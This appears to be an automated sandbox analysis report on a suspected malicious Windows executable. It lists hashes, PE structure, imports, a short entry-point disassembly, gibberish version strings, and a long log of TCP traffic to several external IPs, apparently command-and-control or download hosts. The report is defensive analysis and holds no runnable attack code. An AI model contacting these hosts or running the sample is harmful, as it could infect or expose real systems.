SHA256:fe8b5d3603da5a11a7a8cc11cf63adc2eef35a41bfe8161f390e94ee98dc63e3
SHA512:7751e88b68687be25f5218253550f766b3c5ecddb5884dfb3733bd9d159b40a20b51e706f5fb100f7dee55312bf385808f1d84d39509f4b7f06db6a619ce7cb1

File Icon

Static PE Info

General

Entrypoint:0x402000
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x3E692464 [Fri Mar 07 22:59:48 2003 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0

Entrypoint Preview

Instruction
push 00000000h
call dword ptr [00403248h]
mov dword ptr [004040B9h], eax
mov ecx, 0001EB0Ch
call 0D2F59EAh
jmp 0D2F4BB9h
push 004040A9h
call dword ptr [00403668h]
test eax, eax
je 0D2F49EDh
push 00000000h
push dword ptr [004040B9h]
push 00000000h
push 00000000h
push 00000100h
push 00000100h
push 00000080h
push 00000090h
push 00CF0000h
push 00404000h
push 0040406Eh
push 00000000h
call dword ptr [00403640h]
test eax, eax
je 0D2F49B2h
push 00000000h
push 00000000h
push 00000000h
push 004040D9h
call dword ptr [00403650h]
cmp eax, 01h
jc 0D2F499Ch
jne 0D2F496Ah
push 004040D9h
call dword ptr [00403674h]
push 004040D9h
call dword ptr [00403648h]
jmp 0D2F4952h
push dword ptr [004040E1h]
call dword ptr [004031F8h]
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 01h
je 0D2F4A12h
cmp dword ptr [ebp+0Ch], 05h
je 0D2F49ACh
cmp dword ptr [ebp+0Ch], 07h
je 0D2F49EFh

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x30bc0x6e8.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x2c40.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeEntropyXored PEZLIB ComplexityFile TypeCharacteristics
.yhgq0x10000x1760x2003.8501508954False0.5078125ump; dataIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text0x20000x17a40x18006.28919596492False0.6484375ump; dataIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data0x40000x5f80x6001.2359485614False0.156901041667ump; dataIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata0x50000x14dd0x16004.5822285786False0.471590909091ump; dataIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x70000x2c400x2e004.38642924386False0.294497282609ump; dataIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryNbr Of FunctionsXored PE
RT_ICON0x70a80x25a8ump; data0False
RT_MENU0x96b40x90ump; dataEnglishUnited States0False
RT_GROUP_ICON0x96600x14ump; MS Windows icon resource - 1 icon0False
RT_VERSION0x97840x22cump; data0False
RT_MANIFEST0x99f00x250ump; XML document text0False

Imports

DLLImport
KERNEL32.dllCloseHandle, CreateFileW, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileW, FindNextFileW, FormatMessageW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetCommandLineW, GetComputerNameW, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceA, GetEnvironmentStringsA, GetEnvironmentStringsW, GetFileAttributesW, GetFileType, GetLastError, GetLocalTime, GetModuleHandleA, GetModuleHandleW, GetStdHandle, GetSystemTimeAsFileTime, GetVersionExA, GetVolumeInformationW, GlobalMemoryStatus, LoadLibraryA, LoadLibraryW, LocalAlloc, LocalFree, QueryDosDeviceW, SetLastError, SetUnhandledExceptionFilter, TerminateProcess, UnhandledExceptionFilter, WideCharToMultiByte, WriteConsoleW, WriteFile, lstrcatW, lstrcmpW, lstrcpyW, lstrlenW
USER32.dllCreateWindowExA, DefWindowProcA, DispatchMessageA, GetClientRect, GetMessageA, LoadIconA, MessageBoxA, MessageBoxW, MoveWindow, PostQuitMessage, RegisterClassA, SendMessageA, SetFocus, TranslateMessage, wsprintfW
gdi32.dllCreateFontA, DeleteObject

Version Infos

DescriptionData
LegalCopyrightAll rights reserved.
FileDescriptionunpnpao uhnwlnylpggy
FileVersion1.0.2.2
OriginalFilenamenawchdupee.exe
ProductVersion1.0.2.2
Translation0x0409 0x0000

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 19, 2015 13:01:47.349020958 MEZ5990253192.168.1.10195.186.1.121
Feb 19, 2015 13:01:47.398987055 MEZ5359902195.186.1.121192.168.1.10
Feb 19, 2015 13:01:47.403669119 MEZ103080192.168.1.1091.198.22.70
Feb 19, 2015 13:01:47.403701067 MEZ80103091.198.22.70192.168.1.10
Feb 19, 2015 13:01:47.403815031 MEZ103080192.168.1.1091.198.22.70
Feb 19, 2015 13:01:47.404910088 MEZ103080192.168.1.1091.198.22.70
Feb 19, 2015 13:01:47.404930115 MEZ80103091.198.22.70192.168.1.10
Feb 19, 2015 13:01:54.938848019 MEZ80103091.198.22.70192.168.1.10
Feb 19, 2015 13:01:54.956389904 MEZ103080192.168.1.1091.198.22.70
Feb 19, 2015 13:01:54.956471920 MEZ80103091.198.22.70192.168.1.10
Feb 19, 2015 13:01:54.956564903 MEZ103080192.168.1.1091.198.22.70
Feb 19, 2015 13:01:55.674268007 MEZ103114033192.168.1.1031.43.236.251
Feb 19, 2015 13:01:55.674316883 MEZ14033103131.43.236.251192.168.1.10
Feb 19, 2015 13:01:55.674433947 MEZ103114033192.168.1.1031.43.236.251
Feb 19, 2015 13:01:55.676322937 MEZ103114033192.168.1.1031.43.236.251
Feb 19, 2015 13:01:55.676342964 MEZ14033103131.43.236.251192.168.1.10
Feb 19, 2015 13:01:56.031141043 MEZ14033103131.43.236.251192.168.1.10
Feb 19, 2015 13:01:56.031328917 MEZ103114033192.168.1.1031.43.236.251
Feb 19, 2015 13:01:56.031881094 MEZ103114033192.168.1.1031.43.236.251
Feb 19, 2015 13:01:56.031907082 MEZ14033103131.43.236.251192.168.1.10
Feb 19, 2015 13:01:56.036761999 MEZ6378953192.168.1.10195.186.1.121
Feb 19, 2015 13:01:56.329562902 MEZ5363789195.186.1.121192.168.1.10
Feb 19, 2015 13:01:56.333086967 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:56.333120108 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:56.333235025 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:56.334208965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:56.334228992 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.230360031 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.338836908 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.338840961 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.338927984 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.338937044 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.339025021 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.339380026 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.339421988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.339426994 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.339742899 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.339775085 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.342705011 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.342711926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.342714071 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.342807055 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.354738951 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.354759932 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.354917049 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.432318926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.432439089 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.531083107 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.531810045 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.531829119 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.531976938 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.531991005 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.532082081 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.536916971 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.536926031 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.536928892 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537038088 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.537331104 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537339926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537427902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.537437916 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.537525892 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.542785883 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566746950 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566764116 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566852093 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.566863060 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.566947937 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.630913019 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631623030 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631639957 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631758928 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.631779909 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.631874084 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.636456013 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636473894 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636476994 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636598110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.636801004 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636806965 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.636908054 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.636925936 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.637017965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.643008947 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.654889107 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.654910088 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.655093908 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.655118942 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.655205965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.730249882 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.730910063 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.730926037 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.731034994 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.731055975 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.731151104 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.737787008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.737807989 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.737812042 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.737972021 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.738429070 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.738482952 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.738615036 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.738637924 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.738759041 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.742296934 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.742312908 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.742316008 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.742463112 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.748815060 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.790353060 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832084894 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832108974 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832256079 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.832279921 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.832609892 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.836440086 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836460114 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836463928 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836584091 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.836656094 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836673021 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836781979 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.836801052 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.836941004 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.842396021 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.870721102 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.870732069 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.870893002 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.870907068 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.871011019 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.930738926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.931729078 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.931746006 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.931922913 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.931946039 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.932068110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.936877012 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.936894894 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.936897993 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937109947 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.937202930 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937221050 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937334061 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.937352896 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.937444925 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.943394899 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967006922 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967029095 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967257023 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.967279911 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.967395067 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.030251026 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031028986 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031045914 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031188965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.031210899 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.031332016 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.037748098 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.037767887 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.037770987 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.037992954 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.038433075 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.038450003 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.038630009 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.038651943 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.038769007 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.042596102 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067202091 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067224979 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067404032 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.067426920 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.067548990 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.137345076 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.140702963 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.140717030 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.140934944 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.140959024 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.141063929 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.142179966 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.142195940 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.142199039 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.142335892 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.144345999 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.144361973 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.144524097 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.144542933 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.144639015 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.151237965 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.151258945 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.151262045 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.151474953 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.231450081 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.231472015 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.231475115 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.231681108 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.231746912 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.237160921 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237180948 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237184048 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237384081 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.237593889 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237611055 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237715960 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.237735033 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.237864971 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.242947102 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255680084 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255701065 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255872965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.255896091 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.255990028 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.267285109 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331008911 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331031084 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331249952 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.331273079 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.331401110 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.336451054 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336469889 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336472988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336631060 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.336680889 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336698055 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336796045 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.336812973 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.336895943 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.342415094 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.365793943 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.365814924 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.365999937 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.366023064 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.366132975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.432063103 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435595036 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435612917 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435834885 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.435857058 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.435971975 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.440133095 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440150976 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440154076 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440345049 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.440890074 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.440907001 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.441025972 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.441046000 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.441144943 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.444833040 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.456792116 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.456813097 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.456991911 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.457015038 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.457125902 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.533893108 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.535803080 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.535820007 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.535995960 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.536017895 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.536117077 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.538635015 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.538641930 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.538645983 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.538799047 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.539542913 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.539558887 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.539664984 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.539685011 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.539783001 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.546384096 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.746504068 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.746656895 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.966924906 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.966950893 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967108965 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967142105 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967152119 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967155933 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967289925 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967310905 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967318058 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967320919 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967466116 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967487097 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967492104 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967494965 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967545986 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967552900 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967567921 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967571020 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967749119 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:59.967768908 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967773914 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:59.967827082 MEZ103280192.168.1.10216.194.168.39
